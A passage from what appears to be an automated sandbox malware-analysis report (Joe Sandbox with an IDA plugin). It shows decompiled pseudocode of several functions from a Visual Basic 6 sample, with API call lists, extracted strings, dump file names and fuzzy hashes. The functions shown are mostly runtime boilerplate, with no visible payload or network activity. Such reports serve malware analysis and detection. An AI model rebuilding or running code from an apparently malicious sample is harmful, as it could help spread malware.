				_v140 =  *_v180;
				_t127 =  *((intOrPtr*)( *_v140 + 0x14))(_v140,  &_v56);
				asm("fclex");
				_v144 = _t127;
				if(_v144 >= 0) {
					_v184 = _v184 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x403c24);
					_push(_v140);
					_push(_v144);
					L00401574();
					_v184 = _t127;
				}
				_v148 = _v56;
				_t132 =  *((intOrPtr*)( *_v148 + 0xf0))(_v148,  &_v52);
				asm("fclex");
				_v152 = _t132;
				if(_v152 >= 0) {
					_v188 = _v188 & 0x00000000;
				} else {
					_push(0xf0);
					_push(0x403e50);
					_push(_v148);
					_push(_v152);
					L00401574();
					_v188 = _t132;
				}
				_t133 = _v52;
				_v164 = _t133;
				_v52 = _v52 & 0x00000000;
				L00401544();
				L00401562();
				_v48 = 0x649a5c60;
				_v44 = 0x5b02;
				asm("wait");
				_push(0x41691f);
				L00401532();
				L00401532();
				L00401532();
				return _t133;
			}

0x004165f0
0x004165fb
0x004165fc
0x00416608
0x00416610
0x00416613
0x00416620
0x00416625
0x0041662c
0x00416639
0x00416641
0x00416645
0x00416646
0x0041664b
0x00416652
0x0041665f
0x00416660
0x00416666
0x00416667
0x0041666c
0x00416676
0x0041667a
0x0041667b
0x0041667d
0x0041668e
0x00416690
0x00416697
0x004166a4
0x004166a9
0x004166ae
0x004166af
0x004166b4
0x004166ba
0x004166ba
0x004166c6
0x004166e3
0x004166c8
0x004166c8
0x004166cd
0x004166d2
0x004166d7
0x004166d7
0x004166ed
0x004166f5
0x0041670d
0x00416710
0x00416712
0x0041671f
0x00416741
0x00416721
0x00416721
0x00416723
0x00416728
0x0041672e
0x00416734
0x00416739
0x00416739
0x0041674b
0x00416763
0x00416766
0x00416768
0x00416775
0x00416797
0x00416777
0x00416777
0x00416779
0x0041677e
0x00416784
0x0041678a
0x0041678f
0x0041678f
0x004167a1
0x004167a7
0x004167b4
0x004167bc
0x004167c8
0x004167e5
0x004167ca
0x004167ca
0x004167cf
0x004167d4
0x004167d9
0x004167d9
0x004167f7
0x0041680f
0x00416812
0x00416814
0x00416821
0x00416843
0x00416823
0x00416823
0x00416825
0x0041682a
0x00416830
0x00416836
0x0041683b
0x0041683b
0x0041684d
0x00416865
0x0041686b
0x0041686d
0x0041687a
0x0041689f
0x0041687c
0x0041687c
0x00416881
0x00416886
0x0041688c
0x00416892
0x00416897
0x00416897
0x004168a6
0x004168a9
0x004168af
0x004168bc
0x004168c4
0x004168c9
0x004168d0
0x004168d7
0x004168d8
0x00416909
0x00416911
0x00416919
0x0041691e

APIs

__vbaChkstk.MSVBVM60(?,00401316), ref: 00416608
__vbaStrCopy.MSVBVM60(?,?,?,?,00401316), ref: 00416620
__vbaVarDup.MSVBVM60 ref: 00416639
#542.MSVBVM60(?,?), ref: 00416646
__vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?), ref: 00416667
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?), ref: 0041667D
__vbaVarDup.MSVBVM60 ref: 004166A4
#600.MSVBVM60(?,00000002), ref: 004166AF
__vbaFreeVar.MSVBVM60(?,00000002), ref: 004166BA
__vbaNew2.MSVBVM60(00403C34,00417360), ref: 004166D2
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C24,00000014), ref: 00416734
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E50,00000058), ref: 0041678A
__vbaStrMove.MSVBVM60 ref: 004167B4
__vbaFreeObj.MSVBVM60 ref: 004167BC
__vbaNew2.MSVBVM60(00403C34,00417360), ref: 004167D4
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C24,00000014), ref: 00416836
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E50,000000F0), ref: 00416892
__vbaStrMove.MSVBVM60 ref: 004168BC
__vbaFreeObj.MSVBVM60 ref: 004168C4
__vbaFreeStr.MSVBVM60(0041691F), ref: 00416909
__vbaFreeStr.MSVBVM60(0041691F), ref: 00416911
__vbaFreeStr.MSVBVM60(0041691F), ref: 00416919

Strings

9-9-9, xrefs: 00416625
`sA, xrefs: 004167E5
BRUNSTIGT, xrefs: 00416690
`sA, xrefs: 004166ED

Memory Dump Source

Source File: 0000000C.00000002.420603886.0000000000411000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.420579967.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.420585928.0000000000401000.00000020.00020000.sdmp Download File
Associated: 0000000C.00000002.420619483.0000000000417000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.420630488.0000000000419000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_ota.jbxd

Similarity

API ID: __vba$Free$CheckHresult$MoveNew2$#542#600ChkstkCopyList
String ID: 9-9-9$BRUNSTIGT$`sA$`sA
API String ID: 4053396955-534013874
Opcode ID: f0772ad08ab8814cf1f552e6ae681ef2193318251d75c4871ca37087f0106a6b
Instruction ID: 4b8803b8daaf24ccefd75b0fd308320c357353a08016457b954f0b3a5e280459
Opcode Fuzzy Hash: f0772ad08ab8814cf1f552e6ae681ef2193318251d75c4871ca37087f0106a6b
Instruction Fuzzy Hash: 6A91E87190021CAFDB10DFA1CD46BDDB7B5BF44308F1080AAE50AB72A1DB789A89DF55

Uniqueness

Uniqueness Score: -1.00%

Function 00416057, Relevance: 43.9, APIs: 22, Strings: 3, Instructions: 173
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 52%

			E00416057(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a8, void* _a32) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				char _v40;
				intOrPtr _v48;
				char _v56;
				intOrPtr _v64;
				intOrPtr _v72;
				void* _v76;
				signed int _v80;
				intOrPtr* _v84;
				signed int _v88;
				char _v96;
				signed int _v100;
				signed int _v104;
				char _v108;
				signed int _v112;
				signed int _v116;
				signed int _t85;
				signed int _t89;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr _t128;

				_push(0x401316);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t128;
				_push(0x60);
				L00401310();
				_v12 = _t128;
				_v8 = 0x4012d0;
				L00401556();
				L00401556();
				if( *0x417360 != 0) {
					_v96 = 0x417360;
				} else {
					_push(0x417360);
					_push(0x403c34);
					L0040156E();
					_v96 = 0x417360;
				}
				_t9 =  &_v96; // 0x417360
				_v76 =  *((intOrPtr*)( *_t9));
				_t85 =  *((intOrPtr*)( *_v76 + 0x4c))(_v76,  &_v40);
				asm("fclex");
				_v80 = _t85;
				if(_v80 >= 0) {
					_v100 = _v100 & 0x00000000;
				} else {
					_push(0x4c);
					_push(0x403c24);
					_push(_v76);
					_push(_v80);
					L00401574();
					_v100 = _t85;
				}
				_v84 = _v40;
				_t89 =  *((intOrPtr*)( *_v84 + 0x28))(_v84);
				asm("fclex");
				_v88 = _t89;
				if(_v88 >= 0) {
					_v104 = _v104 & 0x00000000;
				} else {
					_push(0x28);
					_push(0x403f10);
					_push(_v84);
					_push(_v88);
					L00401574();
					_v104 = _t89;
				}
				L00401562();
				_v48 = 1;
				_v56 = 2;
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xffffffff);
				_t90 =  &_v56;
				_push(_t90);
				L004013CA();
				L00401544();
				L0040152C();
				_push(0x404090);
				L004013C4();
				L00401544();
				_push(_t90);
				_push(0x40409c);
				L0040154A();
				asm("sbb eax, eax");
				_v76 =  ~( ~( ~_t90));
				L00401532();
				_t94 = _v76;
				if(_t94 != 0) {
					if( *0x417360 != 0) {
						_v108 = 0x417360;
					} else {
						_push(0x417360);
						_push(0x403c34);
						L0040156E();
						_v108 = 0x417360;
					}
					_t46 =  &_v108; // 0x417360
					_v76 =  *((intOrPtr*)( *_t46));
					_t100 =  *((intOrPtr*)( *_v76 + 0x1c))(_v76,  &_v40);
					asm("fclex");
					_v80 = _t100;
					if(_v80 >= 0) {
						_v112 = _v112 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x403c24);
						_push(_v76);
						_push(_v80);
						L00401574();
						_v112 = _t100;
					}
					_v84 = _v40;
					_v64 = 0x80020004;
					_v72 = 0xa;
					L00401310();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t94 =  *((intOrPtr*)( *_v84 + 0x60))(_v84, L"Quadrumana7", 0x10);
					asm("fclex");
					_v88 = _t94;
					if(_v88 >= 0) {
						_v116 = _v116 & 0x00000000;
					} else {
						_push(0x60);
						_push(0x403cec);
						_push(_v84);
						_push(_v88);
						L00401574();
						_v116 = _t94;
					}
					L00401562();
				}
				_push(0x4162af);
				L00401532();
				L00401532();
				L00401532();
				return _t94;
			}

0x0041605c
0x00416067
0x00416068
0x0041606f
0x00416072
0x0041607a
0x0041607d
0x0041608a
0x00416095
0x004160a1
0x004160bb
0x004160a3
0x004160a3
0x004160a8
0x004160ad
0x004160b2
0x004160b2
0x004160c2
0x004160c7
0x004160d6
0x004160d9
0x004160db
0x004160e2
0x004160fb
0x004160e4
0x004160e4
0x004160e6
0x004160eb
0x004160ee
0x004160f1
0x004160f6
0x004160f6
0x00416102
0x0041610d
0x00416110
0x00416112
0x00416119
0x00416132
0x0041611b
0x0041611b
0x0041611d
0x00416122
0x00416125
0x00416128
0x0041612d
0x0041612d
0x00416139
0x0041613e
0x00416145
0x0041614c
0x0041614e
0x00416150
0x00416152
0x00416154
0x00416157
0x00416158
0x00416162
0x0041616a
0x0041616f
0x00416174
0x0041617e
0x00416183
0x00416184
0x00416189
0x00416190
0x00416196
0x0041619d
0x004161a2
0x004161a8
0x004161b5
0x004161cf
0x004161b7
0x004161b7
0x004161bc
0x004161c1
0x004161c6
0x004161c6
0x004161d6
0x004161db
0x004161ea
0x004161ed
0x004161ef
0x004161f6
0x0041620f
0x004161f8
0x004161f8
0x004161fa
0x004161ff
0x00416202
0x00416205
0x0041620a
0x0041620a
0x00416216
0x00416219
0x00416220
0x0041622a
0x00416234
0x00416235
0x00416236
0x00416237
0x00416245
0x00416248
0x0041624a
0x00416251
0x0041626a
0x00416253
0x00416253
0x00416255
0x0041625a
0x0041625d
0x00416260
0x00416265
0x00416265
0x00416271
0x00416271
0x00416276
0x00416299
0x004162a1
0x004162a9
0x004162ae

APIs

__vbaChkstk.MSVBVM60(?,00401316), ref: 00416072
__vbaStrCopy.MSVBVM60(?,?,?,?,00401316), ref: 0041608A
__vbaStrCopy.MSVBVM60(?,?,?,?,00401316), ref: 00416095
__vbaNew2.MSVBVM60(00403C34,00417360,?,?,?,?,00401316), ref: 004160AD
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C24,0000004C), ref: 004160F1
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403F10,00000028), ref: 00416128
__vbaFreeObj.MSVBVM60 ref: 00416139
#703.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 00416158
__vbaStrMove.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 00416162
__vbaFreeVar.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041616A
#713.MSVBVM60(00404090,00000002,000000FF,000000FE,000000FE,000000FE), ref: 00416174
__vbaStrMove.MSVBVM60(00404090,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041617E
__vbaStrCmp.MSVBVM60(0040409C,00000000,00404090,00000002,000000FF,000000FE,000000FE,000000FE), ref: 00416189
__vbaFreeStr.MSVBVM60(0040409C,00000000,00404090,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041619D
__vbaNew2.MSVBVM60(00403C34,00417360,0040409C,00000000,00404090,00000002,000000FF,000000FE,000000FE,000000FE), ref: 004161C1
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C24,0000001C), ref: 00416205
__vbaChkstk.MSVBVM60 ref: 0041622A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CEC,00000060), ref: 00416260
__vbaFreeObj.MSVBVM60 ref: 00416271
__vbaFreeStr.MSVBVM60(004162AF,0040409C,00000000,00404090,00000002,000000FF,000000FE,000000FE,000000FE), ref: 00416299
__vbaFreeStr.MSVBVM60(004162AF,0040409C,00000000,00404090,00000002,000000FF,000000FE,000000FE,000000FE), ref: 004162A1
__vbaFreeStr.MSVBVM60(004162AF,0040409C,00000000,00404090,00000002,000000FF,000000FE,000000FE,000000FE), ref: 004162A9

Strings

`sA, xrefs: 004161D6
Quadrumana7, xrefs: 00416238
`sA, xrefs: 004160C2

Memory Dump Source

Source File: 0000000C.00000002.420603886.0000000000411000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.420579967.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.420585928.0000000000401000.00000020.00020000.sdmp Download File
Associated: 0000000C.00000002.420619483.0000000000417000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.420630488.0000000000419000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_ota.jbxd

Similarity

API ID: __vba$Free$CheckHresult$ChkstkCopyMoveNew2$#703#713
String ID: Quadrumana7$`sA$`sA
API String ID: 3288888489-1460265835
Opcode ID: 7de823fc231ed5091995ce2cc3621f29ff3041cce08a3d4491753ee7ceb51cb6
Instruction ID: 8876f553b12f1434e359d08b9e66c653a4ddd6df650971cd625725b27109883f
Opcode Fuzzy Hash: 7de823fc231ed5091995ce2cc3621f29ff3041cce08a3d4491753ee7ceb51cb6
Instruction Fuzzy Hash: 9861F370940218AFDB10EFA5C946BDDBBB5BF48714F20412AE412BB2E1DB789A45CB19

Uniqueness

Uniqueness Score: -1.00%

Function 00415D56, Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 213
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 56%

			E00415D56(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				intOrPtr _v32;
				signed int _v36;
				char _v40;
				char _v56;
				intOrPtr _v64;
				intOrPtr _v72;
				void* _v76;
				signed int _v80;
				void* _v84;
				signed int _v88;
				signed int _v96;
				intOrPtr _v100;
				char _v104;
				signed int _v108;
				signed int _v112;
				char _v116;
				signed int _v120;
				signed int _v124;
				char _v128;
				signed int _v132;
				signed int _v136;
				char* _t116;
				signed int _t123;
				signed int _t128;
				signed int _t135;
				signed int _t140;
				signed int _t141;
				signed int _t147;
				signed int _t152;
				intOrPtr _t174;

				_push(0x401316);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t174;
				_push(0x74);
				L00401310();
				_v12 = _t174;
				_v8 = 0x4012c0;
				_v56 = 1;
				_t116 =  &_v56;
				_push(_t116);
				L004013B8();
				_v76 =  ~(0 | _t116 != 0x0000ffff);
				L0040152C();
				if(_v76 != 0) {
					if( *0x417360 != 0) {
						_v104 = 0x417360;
					} else {
						_push(0x417360);
						_push(0x403c34);
						L0040156E();
						_v104 = 0x417360;
					}
					_t12 =  &_v104; // 0x417360
					_v76 =  *((intOrPtr*)( *_t12));
					_t147 =  *((intOrPtr*)( *_v76 + 0x1c))(_v76,  &_v40);
					asm("fclex");
					_v80 = _t147;
					if(_v80 >= 0) {
						_v108 = _v108 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x403c24);
						_push(_v76);
						_push(_v80);
						L00401574();
						_v108 = _t147;
					}
					_v84 = _v40;
					_v64 = 0x80020004;
					_v72 = 0xa;
					L00401310();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t152 =  *((intOrPtr*)( *_v84 + 0x60))(_v84, L"Unsabered", 0x10);
					asm("fclex");
					_v88 = _t152;
					if(_v88 >= 0) {
						_v112 = _v112 & 0x00000000;
					} else {
						_push(0x60);
						_push(0x403cec);
						_push(_v84);
						_push(_v88);
						L00401574();
						_v112 = _t152;
					}
					L00401562();
				}
				if( *0x417360 != 0) {
					_v116 = 0x417360;
				} else {
					_push(0x417360);
					_push(0x403c34);
					L0040156E();
					_v116 = 0x417360;
				}
				_t43 =  &_v116; // 0x417360
				_v76 =  *((intOrPtr*)( *_t43));
				_t123 =  *((intOrPtr*)( *_v76 + 0x14))(_v76,  &_v40);
				asm("fclex");
				_v80 = _t123;
				if(_v80 >= 0) {
					_v120 = _v120 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x403c24);
					_push(_v76);
					_push(_v80);
					L00401574();
					_v120 = _t123;
				}
				_v84 = _v40;
				_t128 =  *((intOrPtr*)( *_v84 + 0x58))(_v84,  &_v36);
				asm("fclex");
				_v88 = _t128;
				if(_v88 >= 0) {
					_v124 = _v124 & 0x00000000;
				} else {
					_push(0x58);
					_push(0x403e50);
					_push(_v84);
					_push(_v88);
					L00401574();
					_v124 = _t128;
				}
				_v96 = _v36;
				_v36 = _v36 & 0x00000000;
				L00401544();
				L00401562();
				if( *0x417360 != 0) {
					_v128 = 0x417360;
				} else {
					_push(0x417360);
					_push(0x403c34);
					L0040156E();
					_v128 = 0x417360;
				}
				_t78 =  &_v128; // 0x417360
				_v76 =  *((intOrPtr*)( *_t78));
				_t135 =  *((intOrPtr*)( *_v76 + 0x14))(_v76,  &_v40);
				asm("fclex");
				_v80 = _t135;
				if(_v80 >= 0) {
					_v132 = _v132 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x403c24);
					_push(_v76);
					_push(_v80);
					L00401574();
					_v132 = _t135;
				}
				_v84 = _v40;
				_t140 =  *((intOrPtr*)( *_v84 + 0xf0))(_v84,  &_v36);
				asm("fclex");
				_v88 = _t140;
				if(_v88 >= 0) {
					_v136 = _v136 & 0x00000000;
				} else {
					_push(0xf0);
					_push(0x403e50);
					_push(_v84);
					_push(_v88);
					L00401574();
					_v136 = _t140;
				}
				_t141 = _v36;
				_v100 = _t141;
				_v36 = _v36 & 0x00000000;
				L00401544();
				L00401562();
				_v32 = 0x6bb984;
				_push(0x41603c);
				L00401532();
				L00401532();
				return _t141;
			}

0x00415d5b
0x00415d66
0x00415d67
0x00415d6e
0x00415d71
0x00415d79
0x00415d7c
0x00415d83
0x00415d8a
0x00415d8d
0x00415d8e
0x00415d9e
0x00415da5
0x00415db0
0x00415dbd
0x00415dd7
0x00415dbf
0x00415dbf
0x00415dc4
0x00415dc9
0x00415dce
0x00415dce
0x00415dde
0x00415de3
0x00415df2
0x00415df5
0x00415df7
0x00415dfe
0x00415e17
0x00415e00
0x00415e00
0x00415e02
0x00415e07
0x00415e0a
0x00415e0d
0x00415e12
0x00415e12
0x00415e1e
0x00415e21
0x00415e28
0x00415e32
0x00415e3c
0x00415e3d
0x00415e3e
0x00415e3f
0x00415e4d
0x00415e50
0x00415e52
0x00415e59
0x00415e72
0x00415e5b
0x00415e5b
0x00415e5d
0x00415e62
0x00415e65
0x00415e68
0x00415e6d
0x00415e6d
0x00415e79
0x00415e79
0x00415e85
0x00415e9f
0x00415e87
0x00415e87
0x00415e8c
0x00415e91
0x00415e96
0x00415e96
0x00415ea6
0x00415eab
0x00415eba
0x00415ebd
0x00415ebf
0x00415ec6
0x00415edf
0x00415ec8
0x00415ec8
0x00415eca
0x00415ecf
0x00415ed2
0x00415ed5
0x00415eda
0x00415eda
0x00415ee6
0x00415ef5
0x00415ef8
0x00415efa
0x00415f01
0x00415f1a
0x00415f03
0x00415f03
0x00415f05
0x00415f0a
0x00415f0d
0x00415f10
0x00415f15
0x00415f15
0x00415f21
0x00415f24
0x00415f2e
0x00415f36
0x00415f42
0x00415f5c
0x00415f44
0x00415f44
0x00415f49
0x00415f4e
0x00415f53
0x00415f53
0x00415f63
0x00415f68
0x00415f77
0x00415f7a
0x00415f7c
0x00415f83
0x00415f9c
0x00415f85
0x00415f85
0x00415f87
0x00415f8c
0x00415f8f
0x00415f92
0x00415f97
0x00415f97
0x00415fa3
0x00415fb2
0x00415fb8
0x00415fba
0x00415fc1
0x00415fe0
0x00415fc3
0x00415fc3
0x00415fc8
0x00415fcd
0x00415fd0
0x00415fd3
0x00415fd8
0x00415fd8
0x00415fe7
0x00415fea
0x00415fed
0x00415ff7
0x00415fff
0x00416004
0x0041600b
0x0041602e
0x00416036
0x0041603b

APIs

__vbaChkstk.MSVBVM60(?,00401316), ref: 00415D71
#560.MSVBVM60(00000001,?,?,?,?,?,?,?,?,?,?,00401316), ref: 00415D8E
__vbaFreeVar.MSVBVM60(00000001,?,?,?,?,?,?,?,?,?,?,00401316), ref: 00415DA5
__vbaNew2.MSVBVM60(00403C34,00417360,00000001,?,?,?,?,?,?,?,?,?,?,00401316), ref: 00415DC9
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C24,0000001C,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00415E0D
__vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00415E32
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CEC,00000060,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00415E68
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00415E79
__vbaNew2.MSVBVM60(00403C34,00417360,00000001,?,?,?,?,?,?,?,?,?,?,00401316), ref: 00415E91
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C24,00000014), ref: 00415ED5
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E50,00000058), ref: 00415F10
__vbaStrMove.MSVBVM60(00000000,?,00403E50,00000058), ref: 00415F2E
__vbaFreeObj.MSVBVM60(00000000,?,00403E50,00000058), ref: 00415F36
__vbaNew2.MSVBVM60(00403C34,00417360), ref: 00415F4E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C24,00000014), ref: 00415F92
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E50,000000F0), ref: 00415FD3
__vbaStrMove.MSVBVM60(00000000,?,00403E50,000000F0), ref: 00415FF7
__vbaFreeObj.MSVBVM60(00000000,?,00403E50,000000F0), ref: 00415FFF
__vbaFreeStr.MSVBVM60(0041603C), ref: 0041602E
__vbaFreeStr.MSVBVM60(0041603C), ref: 00416036

Strings

`sA, xrefs: 00415EA6
`sA, xrefs: 00415DDE
Unsabered, xrefs: 00415E40
`sA, xrefs: 00415F63

Memory Dump Source

Source File: 0000000C.00000002.420603886.0000000000411000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.420579967.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.420585928.0000000000401000.00000020.00020000.sdmp Download File
Associated: 0000000C.00000002.420619483.0000000000417000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.420630488.0000000000419000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_ota.jbxd

Similarity

API ID: __vba$CheckFreeHresult$New2$ChkstkMove$#560
String ID: Unsabered$`sA$`sA$`sA
API String ID: 3132561629-4184181707
Opcode ID: b091b56765e78d0aff1e719b7bed8e67aab6b575a4f8700eea99d879e2f81320
Instruction ID: fffd2499240530400853eff2f9e187b53279c66c55a65c59d2ed4e1bbd7d9cf6
Opcode Fuzzy Hash: b091b56765e78d0aff1e719b7bed8e67aab6b575a4f8700eea99d879e2f81320
Instruction Fuzzy Hash: 3691D070D00608EFDB10DFA5C886BDDBBB4BF48705F20402AE502BB2A1C7B95A85DF59

Uniqueness

Uniqueness Score: -1.00%

Function 00415AFD, Relevance: 36.9, APIs: 20, Strings: 1, Instructions: 165
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E00415AFD(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4, void* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v40;
				char _v44;
				short _v52;
				char _v60;
				intOrPtr _v68;
				intOrPtr _v76;
				void* _v80;
				void* _v84;
				signed int _v88;
				void* _v92;
				signed int _v96;
				intOrPtr _v104;
				intOrPtr* _v108;
				signed int _v112;
				intOrPtr* _v116;
				signed int _v120;
				signed int _v124;
				char* _t84;
				short _t85;
				char* _t89;
				signed int _t93;
				signed short _t95;
				short _t99;
				signed int _t105;
				signed int _t110;
				signed int _t111;
				intOrPtr _t137;

				_push(0x401316);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t137;
				_push(0x68);
				L00401310();
				_v12 = _t137;
				_v8 = 0x4012b0;
				L00401556();
				_v68 = _a4;
				_v76 = 9;
				L0040151A();
				_t84 =  &_v60;
				_push(_t84);
				L004013BE();
				_v84 =  ~(0 | _t84 != 0x0000ffff);
				L0040152C();
				_t85 = _v84;
				if(_t85 != 0) {
					_push(0xca);
					L00401424();
					_v28 = _t85;
				}
				if( *0x417010 != 0) {
					_v108 = 0x417010;
				} else {
					_push(0x417010);
					_push(0x404410);
					L0040156E();
					_v108 = 0x417010;
				}
				_t89 =  &_v44;
				L004014A8();
				_v84 = _t89;
				_t93 =  *((intOrPtr*)( *_v84 + 0x1a0))(_v84,  &_v80, _t89,  *((intOrPtr*)( *((intOrPtr*)( *_v108)) + 0x318))( *_v108));
				asm("fclex");
				_v88 = _t93;
				if(_v88 >= 0) {
					_v112 = _v112 & 0x00000000;
				} else {
					_push(0x1a0);
					_push(0x403e24);
					_push(_v84);
					_push(_v88);
					L00401574();
					_v112 = _t93;
				}
				_v52 = _v80;
				_v60 = 2;
				_t95 =  &_v60;
				_push(_t95);
				L00401436();
				asm("sbb eax, eax");
				_v92 =  ~( ~( ~_t95));
				L00401562();
				L0040152C();
				_t99 = _v92;
				if(_t99 != 0) {
					_push(0x32);
					L00401430();
					_v32 = _t99;
				}
				if( *0x417360 != 0) {
					_v116 = 0x417360;
				} else {
					_push(0x417360);
					_push(0x403c34);
					L0040156E();
					_v116 = 0x417360;
				}
				_v84 =  *_v116;
				_t105 =  *((intOrPtr*)( *_v84 + 0x14))(_v84,  &_v44);
				asm("fclex");
				_v88 = _t105;
				if(_v88 >= 0) {
					_v120 = _v120 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x403c24);
					_push(_v84);
					_push(_v88);
					L00401574();
					_v120 = _t105;
				}
				_v92 = _v44;
				_t110 =  *((intOrPtr*)( *_v92 + 0xf0))(_v92,  &_v40);
				asm("fclex");
				_v96 = _t110;
				if(_v96 >= 0) {
					_v124 = _v124 & 0x00000000;
				} else {
					_push(0xf0);
					_push(0x403e50);
					_push(_v92);
					_push(_v96);
					L00401574();
					_v124 = _t110;
				}
				_t111 = _v40;
				_v104 = _t111;
				_v40 = _v40 & 0x00000000;
				L00401544();
				L00401562();
				_push(0x415d43);
				L00401532();
				L00401532();
				return _t111;
			}

0x00415b02
0x00415b0d
0x00415b0e
0x00415b15
0x00415b18
0x00415b20
0x00415b23
0x00415b30
0x00415b38
0x00415b3b
0x00415b48
0x00415b4d
0x00415b50
0x00415b51
0x00415b61
0x00415b68
0x00415b6d
0x00415b73
0x00415b75
0x00415b7a
0x00415b7f
0x00415b7f
0x00415b89
0x00415ba3
0x00415b8b
0x00415b8b
0x00415b90
0x00415b95
0x00415b9a
0x00415b9a
0x00415bbe
0x00415bc2
0x00415bc7
0x00415bd6
0x00415bdc
0x00415bde
0x00415be5
0x00415c01
0x00415be7
0x00415be7
0x00415bec
0x00415bf1
0x00415bf4
0x00415bf7
0x00415bfc
0x00415bfc
0x00415c09
0x00415c0d
0x00415c14
0x00415c17
0x00415c18
0x00415c20
0x00415c26
0x00415c2d
0x00415c35
0x00415c3a
0x00415c40
0x00415c42
0x00415c44
0x00415c4c
0x00415c4c
0x00415c56
0x00415c70
0x00415c58
0x00415c58
0x00415c5d
0x00415c62
0x00415c67
0x00415c67
0x00415c7c
0x00415c8b
0x00415c8e
0x00415c90
0x00415c97
0x00415cb0
0x00415c99
0x00415c99
0x00415c9b
0x00415ca0
0x00415ca3
0x00415ca6
0x00415cab
0x00415cab
0x00415cb7
0x00415cc6
0x00415ccc
0x00415cce
0x00415cd5
0x00415cf1
0x00415cd7
0x00415cd7
0x00415cdc
0x00415ce1
0x00415ce4
0x00415ce7
0x00415cec
0x00415cec
0x00415cf5
0x00415cf8
0x00415cfb
0x00415d05
0x00415d0d
0x00415d12
0x00415d35
0x00415d3d
0x00415d42

APIs

__vbaChkstk.MSVBVM60(?,00401316), ref: 00415B18
__vbaStrCopy.MSVBVM60(?,?,?,?,00401316), ref: 00415B30
__vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 00415B48
#562.MSVBVM60(?), ref: 00415B51
__vbaFreeVar.MSVBVM60(?), ref: 00415B68
#569.MSVBVM60(000000CA,?), ref: 00415B7A
__vbaNew2.MSVBVM60(00404410,00417010,?), ref: 00415B95
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?), ref: 00415BC2
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E24,000001A0,?,?,?,?,?,?,?,?), ref: 00415BF7
#592.MSVBVM60(00000002,?,?,?,?,?,?,?,?), ref: 00415C18
__vbaFreeObj.MSVBVM60(00000002,?,?,?,?,?,?,?,?), ref: 00415C2D
__vbaFreeVar.MSVBVM60(00000002,?,?,?,?,?,?,?,?), ref: 00415C35
#571.MSVBVM60(00000032,00000002,?,?,?,?,?,?,?,?), ref: 00415C44
__vbaNew2.MSVBVM60(00403C34,00417360,00000002,?,?,?,?,?,?,?,?), ref: 00415C62
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C24,00000014,?,?,?,?,?,?,?,?), ref: 00415CA6
